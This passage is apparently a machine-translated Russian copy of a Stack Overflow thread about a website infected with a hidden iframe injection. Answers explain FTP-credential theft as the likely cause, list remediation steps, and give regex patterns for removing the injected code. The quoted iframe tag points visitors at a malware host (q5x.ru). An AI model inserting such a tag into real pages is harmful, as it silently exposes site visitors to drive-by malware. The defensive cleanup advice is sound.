Назад | Перейти на главную страницу

Сайт атакован с помощью скрытого iframe (q5x.ru)

Мой веб-сайт недавно был заражен какой-то атакой, связанной с внедрением скрытого iframe, и ее источник был с сайта q5x.ru (без ссылки).

А поиск Гугл не помогло мне понять, как произошла эта атака, поэтому мне было интересно, сталкивался ли кто-нибудь из вас с такой же проблемой?

Код iframe был чем-то вроде:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

По запросу я запускаю веб-сайт ASP.Net с базой данных, а что касается форм, очевидно, что для обратной передачи используется форма ASP.Net.

Недавно мы столкнулись с той же проблемой на веб-сайте одного из наших клиентов.

Эта проблема, скорее всего, вызвана вирусным заражением, которое в первую очередь нацелено на FTP-клиенты и выполняет поиск комбинаций имени хоста / имени пользователя / пароля. После обнаружения открывается соединение с FTP-сервером, он ищет файлы index. * И добавляет к ним iFrame.

В нашем конкретном случае наш клиент был одним из немногих, кто имел прямой доступ к FTP-серверу. Мы немедленно изменили пароли, восстановили резервные копии файлов и удалили доступ по FTP для нашего клиента.

Что вам следует предпринять:

  • Измените свои пароли немедленно
  • Если у вас есть доступ к журналам FTP сервера, узнать, какие файлы были заражены
  • Для зараженных файлов я настоятельно рекомендую вручную восстановить эти файлы и по умолчанию не использовать поиск / замену. В большинстве случаев IFrames добавляются в конец файла, но я также видел, что файлы частично удаляются.

Также обратите внимание, если Сканер Google посещает ваш сайт, пока он заражен, он добавит вас в список вредоносных программ что серьезно повлияет на репутацию вашего сайта. Если это произойдет, сделайте следующие шаги:

  1. Убедитесь, что на сайте больше нет зараженных файлов
  2. Убедитесь, что ваш сайт подтвержден Инструменты Google для веб-мастеров
  3. Используйте Инструменты Google для веб-мастеров, чтобы запросить новый обзор сайта

Вот несколько советов, которые могут вам помочь:

  1. Первое, что нужно сделать для предотвращения подобных атак, - как можно скорее сменить пароли ftp, панели управления и базы данных.
  2. Измените права доступа к файлам на вашем сервере в максимально безопасный режим.
  3. Загрузите все свои файлы с сервера и проверьте на наличие заражений. Очистите зараженные файлы.
  4. Используя хорошее антивирусное программное обеспечение, просканируйте и очистите каждый компьютер, который вы используете для входа на свой хостинг-сервер.
  5. Никогда не используйте общедоступные компьютеры для доступа к вашему серверу.

Как очистить зараженные файлы?

Используйте эти регулярные выражения для поиска всех страниц, содержащих вредоносный код, и замены его пробелом:

<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
position:absolute\”></iframe>

echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;

Возможно, вам придется написать сценарий, чтобы автоматизировать это для всех файлов на сервере.

Источник : http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/

https://stackoverflow.com/questions/990437/iframe-script-attack-to-website

Хотя @Aron пишет что, вероятно, какой-то клиентский вирус перехватил ваши пароли (что вполне может быть правдой для этой конкретной атаки), часто такие атаки используют незащищенные уязвимости в серверном программном обеспечении. Как на самом веб-сервере, в CMS или в таких инструментах, как phpMyAdmin.

Итак: вы уверены, что используете на своем сервере последние версии всего программного обеспечения?

(Или журналы FTP действительно показывают некоторую активность?)

такое случалось со мной раньше. Вам необходимо вручную найти вредоносный сценарий инъекции и удалить его. Я предлагаю вам изменить свои пароли, а также изменить имена своей базы данных и таблиц базы данных, чтобы убедиться, что